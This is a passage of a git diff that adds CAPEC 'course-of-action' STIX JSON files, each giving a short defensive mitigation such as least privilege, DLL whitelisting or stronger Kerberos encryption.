"course-of-action", + "id": "course-of-action--5efe162c-e441-40c4-8bbb-da7c7b9aa0d0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-201-0", + "description": "Configure the XML processor to only retrieve external entities from trusted sources.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--5f1774e8-9dca-4cd7-820a-f1e7a4c29bb2.json b/capec/course-of-action/course-of-action--5f1774e8-9dca-4cd7-820a-f1e7a4c29bb2.json new file mode 100644 index 0000000000..23f254f73b --- /dev/null +++ b/capec/course-of-action/course-of-action--5f1774e8-9dca-4cd7-820a-f1e7a4c29bb2.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--7675084c-89a6-4de4-aa05-494adc774927", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--5f1774e8-9dca-4cd7-820a-f1e7a4c29bb2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-14-4", + "description": "Use an abstraction library to abstract away risky APIs. Not a complete solution.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--5f333309-dde8-4d92-b47c-92de9653c262.json b/capec/course-of-action/course-of-action--5f333309-dde8-4d92-b47c-92de9653c262.json new file mode 100644 index 0000000000..c559492ff5 --- /dev/null +++ b/capec/course-of-action/course-of-action--5f333309-dde8-4d92-b47c-92de9653c262.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--a5398a0b-653b-4c24-acb8-10149d062e67", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--5f333309-dde8-4d92-b47c-92de9653c262", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-611-1", + "description": "When possible, use error-correcting (ECC) memory in local devices as non-ECC memory is significantly more vulnerable to faults.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--5f697f6c-8b52-40bb-8305-138fdf96c077.json b/capec/course-of-action/course-of-action--5f697f6c-8b52-40bb-8305-138fdf96c077.json new file mode 100644 index 0000000000..2882a38ee4 --- /dev/null +++ b/capec/course-of-action/course-of-action--5f697f6c-8b52-40bb-8305-138fdf96c077.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--0db1fd74-b96b-456a-a86a-ac18d66615c2", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--5f697f6c-8b52-40bb-8305-138fdf96c077", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-237-1", + "description": "Design: Use obfuscation and other techniques to prevent reverse engineering the standard libraries.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--6001764e-65ac-41ff-a506-8e25b1d674e5.json b/capec/course-of-action/course-of-action--6001764e-65ac-41ff-a506-8e25b1d674e5.json new file mode 100644 index 0000000000..d568828625 --- /dev/null +++ b/capec/course-of-action/course-of-action--6001764e-65ac-41ff-a506-8e25b1d674e5.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--0ee74400-52ad-48af-bdb0-3556c88bf955", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--6001764e-65ac-41ff-a506-8e25b1d674e5", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-495-0", + "description": "This attack may be mitigated by changing default cache sizes to be larger at the OS level. Additionally rules can be enforced to prune the cache with shorter timeouts for packet reassembly as the cache nears capacity.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--6024a8f5-454d-4e16-9279-9075d9fc39cf.json b/capec/course-of-action/course-of-action--6024a8f5-454d-4e16-9279-9075d9fc39cf.json new file mode 100644 index 0000000000..5e10cf1941 --- /dev/null +++ b/capec/course-of-action/course-of-action--6024a8f5-454d-4e16-9279-9075d9fc39cf.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f14bbe8b-f076-4f59-a526-71c97632de4d", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--6024a8f5-454d-4e16-9279-9075d9fc39cf", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-69-0", + "description": "Apply the principle of least privilege.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--60484e46-3cf9-4fc7-974b-fb842184bbb2.json b/capec/course-of-action/course-of-action--60484e46-3cf9-4fc7-974b-fb842184bbb2.json new file mode 100644 index 0000000000..9e77d97168 --- /dev/null +++ b/capec/course-of-action/course-of-action--60484e46-3cf9-4fc7-974b-fb842184bbb2.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d4055a1f-5ff5-48b0-bc43-572b7145be1c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--60484e46-3cf9-4fc7-974b-fb842184bbb2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-644-0", + "description": "Prevent the use of Lan Man and NT Lan Man authentication on severs and apply patch KB2871997 to Windows 7 and higher systems.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--60486ac0-e215-4bc0-b0d7-aeaab2a90b9b.json b/capec/course-of-action/course-of-action--60486ac0-e215-4bc0-b0d7-aeaab2a90b9b.json new file mode 100644 index 0000000000..ed2d8a0602 --- /dev/null +++ b/capec/course-of-action/course-of-action--60486ac0-e215-4bc0-b0d7-aeaab2a90b9b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--132090d9-a425-4e0f-b73f-59bed6015119", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--60486ac0-e215-4bc0-b0d7-aeaab2a90b9b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-38-1", + "description": "Design: Ensure that the program's compound parts, including all system dependencies, classpath, path, and so on, are secured to the same or higher level assurance as the program", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--60e5864c-2b6e-4ac0-8bdd-82ecc4047c38.json b/capec/course-of-action/course-of-action--60e5864c-2b6e-4ac0-8bdd-82ecc4047c38.json new file mode 100644 index 0000000000..0aba12970c --- /dev/null +++ b/capec/course-of-action/course-of-action--60e5864c-2b6e-4ac0-8bdd-82ecc4047c38.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--1c2a6468-979a-437a-a4b4-cb25f12e4185", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--60e5864c-2b6e-4ac0-8bdd-82ecc4047c38", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-126-2", + "description": "Design: Execute programs with constrained privileges, so parent process does not open up further vulnerabilities. Ensure that all directories, temporary directories and files, and memory are executing with limited privileges to protect against remote execution.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--61b2e7d2-67dd-4305-9afd-b015b4174c88.json b/capec/course-of-action/course-of-action--61b2e7d2-67dd-4305-9afd-b015b4174c88.json new file mode 100644 index 0000000000..9f23482eb6 --- /dev/null +++ b/capec/course-of-action/course-of-action--61b2e7d2-67dd-4305-9afd-b015b4174c88.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--0b9fbc9e-ea0b-43bd-9d3c-9b763822ed74", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--61b2e7d2-67dd-4305-9afd-b015b4174c88", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "coa-125-0", + "description": "Ensure that protocols have specific limits of scale configured.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--61cfd195-6c06-485f-851b-d522704db751.json b/capec/course-of-action/course-of-action--61cfd195-6c06-485f-851b-d522704db751.json new file mode 100644 index 0000000000..ae3a7ab3f6 --- /dev/null +++ b/capec/course-of-action/course-of-action--61cfd195-6c06-485f-851b-d522704db751.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--30fff11a-2e9d-4c4f-a9a0-ff1e320eecd2", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--61cfd195-6c06-485f-851b-d522704db751", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-9-6", + "description": "Do not unnecessarily expose services.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--62130951-9bef-40ea-904e-a1603cfeb0d9.json b/capec/course-of-action/course-of-action--62130951-9bef-40ea-904e-a1603cfeb0d9.json new file mode 100644 index 0000000000..42c6bee85a --- /dev/null +++ b/capec/course-of-action/course-of-action--62130951-9bef-40ea-904e-a1603cfeb0d9.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f6b6812d-1683-4302-9dfd-f980b8be4089", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--62130951-9bef-40ea-904e-a1603cfeb0d9", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-120-5", + "description": "Regular expression can be used to match safe URL patterns. However, that may discard valid URL requests if the regular expression is too restrictive.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--62b2537e-f487-4110-9642-64ab6fa2d255.json b/capec/course-of-action/course-of-action--62b2537e-f487-4110-9642-64ab6fa2d255.json new file mode 100644 index 0000000000..10a31ec16b --- /dev/null +++ b/capec/course-of-action/course-of-action--62b2537e-f487-4110-9642-64ab6fa2d255.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--87f3ad87-a99b-4855-ae15-1df92266ada6", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--62b2537e-f487-4110-9642-64ab6fa2d255", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-39-3", + "description": "Perform validation on the server side to make sure that client side data tokens are consistent with what is expected.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--62c47826-007a-4ee6-8740-9efb84ba061c.json b/capec/course-of-action/course-of-action--62c47826-007a-4ee6-8740-9efb84ba061c.json new file mode 100644 index 0000000000..6579e5c7cc --- /dev/null +++ b/capec/course-of-action/course-of-action--62c47826-007a-4ee6-8740-9efb84ba061c.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--9b20e60c-9b59-4972-beaf-25f44fcdb480", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--62c47826-007a-4ee6-8740-9efb84ba061c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2019-04-04T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-509-3", + "description": "Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--62e3eebc-34ea-4098-a02d-f901f8762132.json b/capec/course-of-action/course-of-action--62e3eebc-34ea-4098-a02d-f901f8762132.json new file mode 100644 index 0000000000..2e60517904 --- /dev/null +++ b/capec/course-of-action/course-of-action--62e3eebc-34ea-4098-a02d-f901f8762132.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--e5c7f007-64be-4fe4-bf31-52c3ad133aeb", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--62e3eebc-34ea-4098-a02d-f901f8762132", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-564-0", + "description": "Restrict write access to logon scripts to necessary administrators.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--63324b5f-6636-4687-8aa4-f81791a2a577.json b/capec/course-of-action/course-of-action--63324b5f-6636-4687-8aa4-f81791a2a577.json new file mode 100644 index 0000000000..0e02340721 --- /dev/null +++ b/capec/course-of-action/course-of-action--63324b5f-6636-4687-8aa4-f81791a2a577.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f8c6f4a5-a71b-428c-a60a-42bde6cdb997", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--63324b5f-6636-4687-8aa4-f81791a2a577", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-471-0", + "description": "\n Design: Fix the Windows loading process to eliminate the preferential search order by looking for DLLs in the precise location where they are expected\n Design: Sign system DLLs so that unauthorized DLLs can be detected.\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--640b34ce-eb05-40c3-854b-abdea45ad098.json b/capec/course-of-action/course-of-action--640b34ce-eb05-40c3-854b-abdea45ad098.json new file mode 100644 index 0000000000..5fc3b2fe16 --- /dev/null +++ b/capec/course-of-action/course-of-action--640b34ce-eb05-40c3-854b-abdea45ad098.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--6dfda408-aaa6-4df9-a923-d57ef4b14154", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--640b34ce-eb05-40c3-854b-abdea45ad098", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-79-4", + "description": "Test your path decoding process against malicious input.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--652fe724-beaf-4db6-9b95-acbaeb383650.json b/capec/course-of-action/course-of-action--652fe724-beaf-4db6-9b95-acbaeb383650.json new file mode 100644 index 0000000000..f54e4622e0 --- /dev/null +++ b/capec/course-of-action/course-of-action--652fe724-beaf-4db6-9b95-acbaeb383650.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--665e112b-730b-4449-9e0d-9af030e4eff7", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--652fe724-beaf-4db6-9b95-acbaeb383650", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-490-0", + "description": "To mitigate this type of an attack, an organization can attempt to identify the 3rd party services being used in an active attack and blocking them until the attack ends. This can be accomplished by filtering traffic for suspicious message patterns such as a spike in traffic where each response contains the same large block of data. Care should be taken to prevent false positive rates so legitimate traffic isn't blocked.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--6593210b-d532-485d-8aad-22672f5f04a2.json b/capec/course-of-action/course-of-action--6593210b-d532-485d-8aad-22672f5f04a2.json new file mode 100644 index 0000000000..2b2a309773 --- /dev/null +++ b/capec/course-of-action/course-of-action--6593210b-d532-485d-8aad-22672f5f04a2.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d15862b5-c98f-4b0d-b132-d8367cd458f3", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--6593210b-d532-485d-8aad-22672f5f04a2", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-01-09T00:00:00.000Z", + "name": "coa-126-6", + "description": "Implementation: Host integrity monitoring for critical files, directories, and processes. The goal of host integrity monitoring is to be aware when a security issue has occurred so that incident response and other forensic activities can begin.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--65e983bd-ecc0-40dc-ae11-8767d8a747f1.json b/capec/course-of-action/course-of-action--65e983bd-ecc0-40dc-ae11-8767d8a747f1.json new file mode 100644 index 0000000000..1c13211888 --- /dev/null +++ b/capec/course-of-action/course-of-action--65e983bd-ecc0-40dc-ae11-8767d8a747f1.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--a1382deb-cdad-448f-aab2-0af615d40d93", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--65e983bd-ecc0-40dc-ae11-8767d8a747f1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-457-1", + "description": "Use anti-virus and anti-malware tools which can prevent malware from executing if it finds its way onto a target system. Additionally, make sure these tools are regularly updated to contain up-to-date virus and malware signatures.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--666a0b8c-b596-4acf-a365-fc65d2731747.json b/capec/course-of-action/course-of-action--666a0b8c-b596-4acf-a365-fc65d2731747.json new file mode 100644 index 0000000000..50723a7aa7 --- /dev/null +++ b/capec/course-of-action/course-of-action--666a0b8c-b596-4acf-a365-fc65d2731747.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--23d50be9-18ef-424d-8670-1b79ad7c384c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--666a0b8c-b596-4acf-a365-fc65d2731747", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2015-12-07T00:00:00.000Z", + "name": "coa-58-2", + "description": "Implementation: Ensure that HTTP methods have proper ACLs based on what the functionality they expose", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--667a9827-66c0-4efa-ba4b-02699ee52948.json b/capec/course-of-action/course-of-action--667a9827-66c0-4efa-ba4b-02699ee52948.json new file mode 100644 index 0000000000..cc40a7797b --- /dev/null +++ b/capec/course-of-action/course-of-action--667a9827-66c0-4efa-ba4b-02699ee52948.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--434fb954-5b71-46b9-9878-fa4312d675f3", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--667a9827-66c0-4efa-ba4b-02699ee52948", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-80-1", + "description": "\n The exact response required from an UTF-8 decoder on invalid input is not uniformly defined by the standards. In general, there are several ways a UTF-8 decoder might behave in the event of an invalid byte sequence:\n \n \n 1. Insert a replacement character (e.g. '?', '').\n 2. Ignore the bytes.\n 3. Interpret the bytes according to a different character encoding (often the ISO-8859-1 character map).\n 4. Not notice and decode as if the bytes were some similar bit of UTF-8.\n 5. Stop decoding and report an error (possibly giving the caller the option to continue).\n \n \n It is possible for a decoder to behave in different ways for different types of invalid input.\n RFC 3629 only requires that UTF-8 decoders must not decode \"overlong sequences\" (where a character is encoded in more bytes than needed but still adheres to the forms above). The Unicode Standard requires a Unicode-compliant decoder to \"...treat any ill-formed code unit sequence as an error condition. This guarantees that it will neither interpret nor emit an ill-formed code unit sequence.\"\n Overlong forms are one of the most troublesome types of UTF-8 data. The current RFC says they must not be decoded but older specifications for UTF-8 only gave a warning and many simpler decoders will happily decode them. Overlong forms have been used to bypass security validations in high profile products including Microsoft's IIS web server. Therefore, great care must be taken to avoid security issues if validation is performed before conversion from UTF-8, and it is generally much simpler to handle overlong forms before any input validation is done.\n To maintain security in the case of invalid input, there are two options. The first is to decode the UTF-8 before doing any input validation checks. The second is to use a decoder that, in the event of invalid input, returns either an error or text that the application considers to be harmless. Another possibility is to avoid conversion out of UTF-8 altogether but this relies on any other software that the data is passed to safely handling the invalid data.\n Another consideration is error recovery. To guarantee correct recovery after corrupt or lost bytes, decoders must be able to recognize the difference between lead and trail bytes, rather than just assuming that bytes will be of the type allowed in their position.\n ", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--67124c75-a596-4e39-84b5-d2de7b878fc0.json b/capec/course-of-action/course-of-action--67124c75-a596-4e39-84b5-d2de7b878fc0.json new file mode 100644 index 0000000000..d3e71e6652 --- /dev/null +++ b/capec/course-of-action/course-of-action--67124c75-a596-4e39-84b5-d2de7b878fc0.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--f5599661-84ef-4095-9668-8170cc70d80c", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--67124c75-a596-4e39-84b5-d2de7b878fc0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2018-07-31T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-641-0", + "description": "Prevent unknown DLLs from loading through whitelisting policy.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--691f66b9-07a3-4c94-8e66-2aa19dd6f99b.json b/capec/course-of-action/course-of-action--691f66b9-07a3-4c94-8e66-2aa19dd6f99b.json new file mode 100644 index 0000000000..b68e025d09 --- /dev/null +++ b/capec/course-of-action/course-of-action--691f66b9-07a3-4c94-8e66-2aa19dd6f99b.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--a45b06c2-17ba-4b5d-9327-7b95c535a4f1", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--691f66b9-07a3-4c94-8e66-2aa19dd6f99b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-556-0", + "description": "Inspect registry for changes. Limit privileges of user accounts so changes to default file handlers can only be performed by authorized administrators.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--693a597c-3229-4a11-88ac-65d2ef0005c0.json b/capec/course-of-action/course-of-action--693a597c-3229-4a11-88ac-65d2ef0005c0.json new file mode 100644 index 0000000000..dbac759b0a --- /dev/null +++ b/capec/course-of-action/course-of-action--693a597c-3229-4a11-88ac-65d2ef0005c0.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--02679582-e17c-4de5-b9fb-3fa3256208de", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--693a597c-3229-4a11-88ac-65d2ef0005c0", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2015-11-09T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-578-0", + "description": "Ensure proper permissions are in place to prevent adversaries from altering the execution status of security tools.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--6988f778-25d5-4902-ae93-e06c754ab230.json b/capec/course-of-action/course-of-action--6988f778-25d5-4902-ae93-e06c754ab230.json new file mode 100644 index 0000000000..198d112297 --- /dev/null +++ b/capec/course-of-action/course-of-action--6988f778-25d5-4902-ae93-e06c754ab230.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--571b923e-575f-43de-9ce2-f46bf0e5ace4", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--6988f778-25d5-4902-ae93-e06c754ab230", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-45-0", + "description": "Pay attention to the fact that the resource you read from can be a replaced by a Symbolic link. You can do a Symlink check before reading the file and decide that this is not a legitimate way of accessing the resource.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--6999dccd-e724-4a98-8a41-b69c72825a3d.json b/capec/course-of-action/course-of-action--6999dccd-e724-4a98-8a41-b69c72825a3d.json new file mode 100644 index 0000000000..f24cc84388 --- /dev/null +++ b/capec/course-of-action/course-of-action--6999dccd-e724-4a98-8a41-b69c72825a3d.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--d58bb735-6240-4987-862d-39e15e477377", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--6999dccd-e724-4a98-8a41-b69c72825a3d", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-14-1", + "description": "The client software should have the latest patches and should be audited for vulnerabilities before being used to communicate with potentially hostile servers.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--69bb2312-f52f-4ff7-b491-a28d010c2c31.json b/capec/course-of-action/course-of-action--69bb2312-f52f-4ff7-b491-a28d010c2c31.json new file mode 100644 index 0000000000..08c850c6dd --- /dev/null +++ b/capec/course-of-action/course-of-action--69bb2312-f52f-4ff7-b491-a28d010c2c31.json @@ -0,0 +1,19 @@ +{ + "type": "bundle", + "id": "bundle--9d6ee7cb-6644-4368-ac21-268595617a38", + "spec_version": "2.0", + "objects": [ + { + "type": "course-of-action", + "id": "course-of-action--69bb2312-f52f-4ff7-b491-a28d010c2c31", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-529-1", + "description": "Identify programs that may be used to acquire peripheral information and block them by using a software restriction policy or tools that restrict program execution by process whitelisting.", + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ] + } + ] +} \ No newline at end of file diff --git a/capec/course-of-action/course-of-action--69eb9c90-2ae5-4bab-aca8-b86865b9f811.json b/capec/course-of-action/course-of-action--69eb9c90-2ae5-4bab-aca8-b86865b9f811.json new file mode 100644 index 0000000000..205c4fc10b --- /dev/null +++ b/capec/course-of-action/course-of-action--69eb9c90-2ae5-4bab-aca8-b86865b9f811.json @@ -0,0 +1,19 @@ +{ + "type": 